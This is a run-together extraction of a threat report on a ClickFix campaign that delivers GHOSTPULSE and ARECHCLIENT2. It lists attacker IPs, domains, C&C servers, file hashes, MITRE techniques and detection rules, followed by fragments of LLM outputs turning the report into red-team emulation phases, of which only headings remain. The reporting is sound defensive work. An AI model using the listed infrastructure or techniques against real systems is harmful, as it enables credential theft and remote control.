Value First Seen Last Seen45.141.87.2492025-06-12 2025-06-12176.126.163.562025-05-06 2025-06-12185.156.72.712025-05-15 2025-06-1291.184.242.372025-05-15 2025-06-1245.141.86.1592025-05-15 2025-06-1267.220.72.1242025-06-05 2025-06-1245.118.248.292025-01-28 2025-06-12172.105.148.2332025-06-03 2025-06-10194.26.27.102025-05-06 2025-06-1045.141.87.2122025-06-08 2025-06-0845.141.86.1492025-05-15 2025-06-08172.235.190.1762025-06-08 2025-06-0845.141.86.822024-12-13 2025-06-0845.141.87.72025-05-13 2025-06-06185.125.50.1402025-04-06 2025-06-03ConclusionThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader todeliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chaingathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromisedmachines.MITRE ATT&CKElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats useagainst enterprise networks.TacticsTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.Initial AccessExecutionDefense EvasionCommand and ControlCollectionTechniquesTechniques represent how an adversary achieves a tactical goal by performing an action.PhishingSpearphishing LinkUser ExecutionMalicious LinkMalicious FileCommand and Scripting InterpreterPowerShellDeobfuscation/DecodingDLL Sideloading |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Defense Evasion
Phase: Persistence
Phase: Execution (Continued)
Phase: Command and Control
Phase: Collection
Phase: Impact
|
Reflective LoadingUser InteractionIngress Tool TransferSystem Information DiscoveryProcess DiscoverySteal Web Session CookieDetecting [malware]DetectionElastic Defend detects this threat with the following behavior protection rules:Suspicious Command Shell Execution via Windows RunDNS Query to Suspicious Top Level DomainLibrary Load of a File Written by a Signed Binary ProxyConnection to WebService by a Signed Binary ProxyPotential Browser Information DiscoveryYARAWindows_Trojan_GhostPulseWindows_Trojan_Arechclient2ObservationsThe following observables were discussed in this research.Observable Type Name Referenceclients.dealeronlinemarketing[.]comdomain Captcha subdomainclients.contology[.]comdomain Captcha subdomainkoonenmagaziner[.]clickdomain50.57.243[.]90ipv4-addrclients.dealeronlinemarketing[.]com& clients.contology[.]com IPaddress144.172.97[.]2ipv4-addrARECHCLIENT2 C&C server143.110.230[.]167ipv4-addrARECHCLIENT2 C&C serverpastebin[.]com/raw/Wg8DHh2xipv4-addrContains ARECHCLIENT2 C&Cserver IP2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56aSHA-256DivXDownloadManager.dllGHOSTPULSEa8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90SHA-256Heeschamjiet.rcPNG GHOSTPULSEf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55SHA-256 DOTNET LOADER4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9SHA-256 ARECHCLIENT2ReferencesThe following were referenced throughout the above research:https://x.com/SI_FalconTeam/status/1915790796948643929https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics |
Model: gpt-4oPhase: Execution
Phase: Defense Evasion
Phase: Initial Access
Phase: Discovery
Phase: Credential Access
Phase: Impact
By understanding and emulating these techniques, a red team can simulate similar attack scenarios for testing and improving organizational defenses. |
| Gemini 2.0 |
|---|
Model: gemini-2.0-flash``` Phase: Initial Access
Phase: Execution
Phase: Payload Deployment
Phase: Execution
Phase: AMSI Bypass
Phase: Reflective Loading
Phase: Data Exfiltration & Remote Control
|
| Gemini 2.5 |
|---|
Model: gemini-2.5-flash-preview-05-20Here's a structured breakdown of the threat actor's procedures, suitable for red team emulation, with IOCs excluded: Phase: Initial Access
Phase: Execution
Phase: Defense Evasion
Phase: Collection
Phase: Command and Control
|